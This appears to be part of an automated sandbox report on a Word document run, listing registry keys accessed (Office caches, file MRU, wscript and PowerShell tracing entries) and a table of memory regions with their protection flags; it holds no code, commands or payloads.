HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.28

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

VersionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

ETag

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

DeferredConfigs

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

ConfigIds

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastSyncTimeWord

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingLastWriteTimeWord

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

NULL

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

ClockTimeSeconds

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData

TickCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries

UpdateComplete

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851216

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328884

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090430

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457444

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033917

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328893

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328905

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851217

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328908

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328916

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033921

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457464

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998158

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM01840907

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457475

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851218

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851219

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851220

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851221

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851222

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998159

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851223

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851224

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033927

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457485

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457491

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851225

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457496

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001115

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328932

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328935

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457503

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328940

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328998

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457510

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851227

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033929

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328972

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328951

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM02835233

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328975

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328983

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328986

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851226

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033937

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328990

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457515

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090434

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

NextUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

LastUpdate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property

0018000FFEF6D4E4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile

MsaDevice

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents

LastPurgeTime

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-CH

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

en-GB

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common

SessionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6644

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 13

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 16

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 17

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 18

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 19

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 20

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0

FilePath

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0

StartDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--lcid=1033&syslcid=8192&uilcid=1033&build=16.0.16827&crev=3\0

EndDate

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6644

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage

SpellingAndGrammarFiles_1033

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage

SpellingAndGrammarFiles_1036

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage

SpellingAndGrammarFiles_3082

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache

LastClean

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6644

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming

RoamingConfigurableSettings

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328932

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851221

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328940

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328935

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328972

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328908

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851218

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328916

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851220

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851224

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998158

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328951

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851222

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851217

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328998

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328893

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328983

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328990

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851219

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM02835233

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328905

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328986

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM01840907

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457444

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851226

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851216

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328884

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851227

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090430

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457475

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851223

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457515

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033

TM03328975

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03090434

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457491

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457464

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033

TM02851225

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457496

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457503

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457510

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001115

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033917

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033919

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM10001114

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM03457485

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033925

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033929

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033927

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033921

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033

TM04033937

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033

TM03998159

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceTicket

HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}

DeviceId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe

JScriptSetScriptStateStarted

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32

FileDirectory

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableAutoFileTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

EnableConsoleTracing

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

ConsoleTracingMask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

MaxFileSize

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS

FileDirectory

There are 268 hidden registries, click here to show them.

Memdumps

Base Address

Regiontype

Protect

Malicious

20D8CE00000

heap

page read and write

20D8CE35000

heap

page read and write

184A221D000

heap

page read and write

184A2190000

heap

page read and write

184BC130000

heap

page read and write

20D8D0D5000

heap

page read and write

2621000

trusted library allocation

page read and write

184A3D31000

trusted library allocation

page read and write

20D8CE79000

heap

page read and write

184A54D6000

trusted library allocation

page read and write

184A3AA0000

heap

page readonly

7FF847150000

trusted library allocation

page read and write

7FF8472C0000

trusted library allocation

page read and write

8B0000

heap

page read and write

923000

heap

page read and write

184A3AE3000

trusted library allocation

page read and write

184BC660000

heap

page read and write

1B100000

heap

page read and write

7FF8472F0000

trusted library allocation

page read and write

7FF847360000

trusted library allocation

page read and write

7FF847390000

trusted library allocation

page read and write

6F6000

stack

page read and write

D7448FE000

stack

page read and write

184A2140000

heap

page read and write

184A3A40000

heap

page read and write

6EBA5B6000

stack

page read and write

7FF847260000

trusted library allocation

page execute and read and write

184BC330000

heap

page read and write

184A3B30000

trusted library allocation

page read and write

7FF8471C0000

trusted library allocation

page execute and read and write

6EBA4F7000

stack

page read and write

8B6000

heap

page read and write

20D8D0D0000

heap

page read and write

184A2420000

heap

page read and write

184A495D000

trusted library allocation

page read and write

D7447FF000

stack

page read and write

184A3BD0000

heap

page read and write

7FF847270000

trusted library allocation

page execute and read and write

1B52E000

stack

page read and write

8E8000

heap

page read and write

7FF847250000

trusted library allocation

page read and write

184A21DF000

heap

page read and write

184B3DA3000

trusted library allocation

page read and write

7FF8470AD000

trusted library allocation

page execute and read and write

7FF847330000

trusted library allocation

page read and write

7FF8470FC000

trusted library allocation

page execute and read and write

8A0000

trusted library allocation

page read and write

184BC0E0000

heap

page execute and read and write

1B840000

heap

page read and write

7FF847290000

trusted library allocation

page execute and read and write

7FF848E24000

trusted library allocation

page read and write

8DE000

heap

page read and write

D7449FE000

stack

page read and write

184A5371000

trusted library allocation

page read and write

7FF847400000

trusted library allocation

page read and write

184A3A90000

trusted library allocation

page read and write

7FF847380000

trusted library allocation

page read and write

BAF000

stack

page read and write

710000

heap

page read and write

12623000

trusted library allocation

page read and write

184BC20C000

heap

page read and write

20D8D0DE000

heap

page read and write

6EBA3FE000

stack

page read and write

8E1000

heap

page read and write

7FF8473C0000

trusted library allocation

page read and write

184A21DD000

heap

page read and write

184A2040000

heap

page read and write

7FF8470A2000

trusted library allocation

page read and write

184A3D20000

heap

page read and write

184A227C000

heap

page read and write

184BC1C0000

heap

page read and write

2460000

trusted library allocation

page read and write

184BC180000

heap

page read and write

7FF847156000

trusted library allocation

page read and write

184BC120000

heap

page execute and read and write

25DE000

stack

page read and write

7FF84715C000

trusted library allocation

page execute and read and write

7FF847370000

trusted library allocation

page read and write

184A58C0000

trusted library allocation

page read and write

7FF8472B0000

trusted library allocation

page read and write

6EBA639000

stack

page read and write

184B3D40000

trusted library allocation

page read and write

6EBB30E000

stack

page read and write

7FF847240000

trusted library allocation

page read and write

7FF8470A4000

trusted library allocation

page read and write

830000

heap

page read and write

7FF847186000

trusted library allocation

page execute and read and write

7FF848E3D000

trusted library allocation

page execute and read and write

184A3BD5000

heap

page read and write

184A3F5D000

trusted library allocation

page read and write

6EBA8BE000

stack

page read and write

6EBA93B000

stack

page read and write

7FF848ED0000

trusted library allocation

page read and write

7DF460F80000

trusted library allocation

page execute and read and write

184BC1B6000

heap

page read and write

184A5368000

trusted library allocation

page read and write

6EBA53E000

stack

page read and write

20D8CFD0000

heap

page read and write

835000

heap

page read and write

D744AFE000

stack

page read and write

20D8CDC0000

heap

page read and write

7FF8472D0000

trusted library allocation

page read and write

184A3BE6000

heap

page read and write

AAE000

stack

page read and write

2610000

heap

page read and write

7FF45FBE0000

trusted library allocation

page execute and read and write

184A21D1000

heap

page read and write

6EBB38F000

stack

page read and write

1B72E000

stack

page read and write

38C000

unkown

page readonly

7FF8470BB000

trusted library allocation

page read and write

184A2219000

heap

page read and write

7FF847410000

trusted library allocation

page read and write

